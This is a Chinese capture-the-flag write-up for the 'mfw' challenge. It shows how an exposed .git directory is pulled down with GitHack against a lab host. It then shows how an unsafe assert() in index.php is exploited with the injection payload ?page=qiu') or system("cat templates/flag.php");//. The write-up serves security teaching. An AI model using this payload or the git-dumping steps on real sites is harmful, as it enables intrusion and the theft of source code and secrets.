[CSAW/网络安全] Git泄露+命令执行 攻防世界 mfw 解题详析

Home界面:


Home界面翻译如下:

欢迎访问我的网站!

我自己从头开始写的!

您可以使用上面的链接浏览页面!


About界面:

观察到Git ,联想Git泄露

Git泄露

Git是一个非常流行的开源分布式版本控制系统,它被广泛用于协同开发和代码管理。许多网站和应用程序都使用Git作为其代码管理系统,并将其部署到生产环境中以维护其代码库。

然而,在配置不当的情况下,可能会导致.git文件夹被直接部署到线上环境中,这可能会导致Git泄露问题。

此时可使用githack等工具下载站点存储库的整个代码历史记录和配置信息。

漏洞利用

通过枚举工具或搜索引擎来查找带有.git文件夹的存储库,以获取包含未加密密码、凭据和敏感信息的站点代码库。

如GET/.git以确认是否存在git泄露

查看是否存在Git漏洞

Payload:/.git

由上图,存在Git漏洞。

下载泄漏文件

利用python的githacker库下载泄露文件


GitHack的安装本文不再赘述

详情参考: [Python/网络安全] Git漏洞之Githack工具基本安装及使用详析


打开Githack,输入Payload:
python GitHack.py http://61.147.171.105:61017/.git

得到文件

代码审计

其中,index.php文件存在以下代码:

<?php
 
if (isset($_GET['page'])) {
	$page = $_GET['page'];
} else {
	$page = "home";
}
//传入page参数,如果没有,则设置为home
           
$file = "templates/" . $page . ".php";
//将page参数拼接成一个templates下的php文件,设置为变量file
 
// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
//判断file中是否有 ..  如果有则直接退出 这是为了防止目录遍历
// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!")
//检查指定的文件是否存在。如果文件不存在,将抛出另一个断言错误并停止脚本的执行。
?>

姿势

由于该代码仅对目录遍历进行防范,因此可构造POC,执行系统命令。

由于下载得到的文件中,templates目录路径下含有flag.php,故应读取该文件中内容

构造POC如下:

?page=qiu or system("cat templates/flag.php");

由于qiu参数不存在,page=qiu返回false 可利用or执行system函数

同时观察到该行代码:

assert("strpos('参数', '..') === false")

如果将上面的POC传入,则变为

assert("strpos('qiu or system("cat templates/flag.php");', '..') === false") 

qiu未被括号闭合,该语句注入不成功

重新构造POC如下:

?page=qiu') or system("cat templates/flag.php");

则语句变为:

assert("strpos('qiu') or system("cat templates/flag.php");', '..') === false") 

再用//将后面的语句注释掉即可

构造POC如下:

?page=qiu') or system("cat templates/flag.php");//

则语句变为:

assert("strpos('qiu') or system("cat templates/flag.php");//', '..') === false") 

最后的语句如下:

assert("strpos('qiu') or system("cat templates/flag.php");

即可实现命令的成功执行:

总结

该题考察Git泄露之存储库读取姿势代码审计命令执行,读者可躬身实践。

相关推荐
underatted3 分钟前
oscp备考 oscp系列——Kioptix Level 1靶场 古老的 Apache Vuln
网络·安全·web安全·网络安全
世事如云有卷舒41 分钟前
git知识点汇总
笔记·git
黑客K-ing1 小时前
什么是护网行动?
网络·安全·web安全
网安-轩逸1 小时前
[网络安全]DVWA之SQL注入—low level解题详析
数据库·sql·web安全
网安墨雨2 小时前
[网络安全]DVWA之File Upload—AntSword(蚁剑)攻击姿势及解题详析合集
android·安全·web安全
Clockwiseee2 小时前
文件上传题目练习
android·服务器·安全·网络安全
koko爱英语4 小时前
区块链安全常见的攻击分析——拒绝服务攻击 (Denial of Service-DOS)King合约【11】
安全·区块链
DX_水位流量监测4 小时前
城市供水管网多普勒超声波流量计,保障供水安全
大数据·运维·服务器·网络·人工智能·安全
xcLeigh4 小时前
网络安全 | 社会工程学:黑客如何利用人性攻击网络
网络·安全·web安全
网络安全-杰克4 小时前
[CTF/网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议)
前端·web安全·php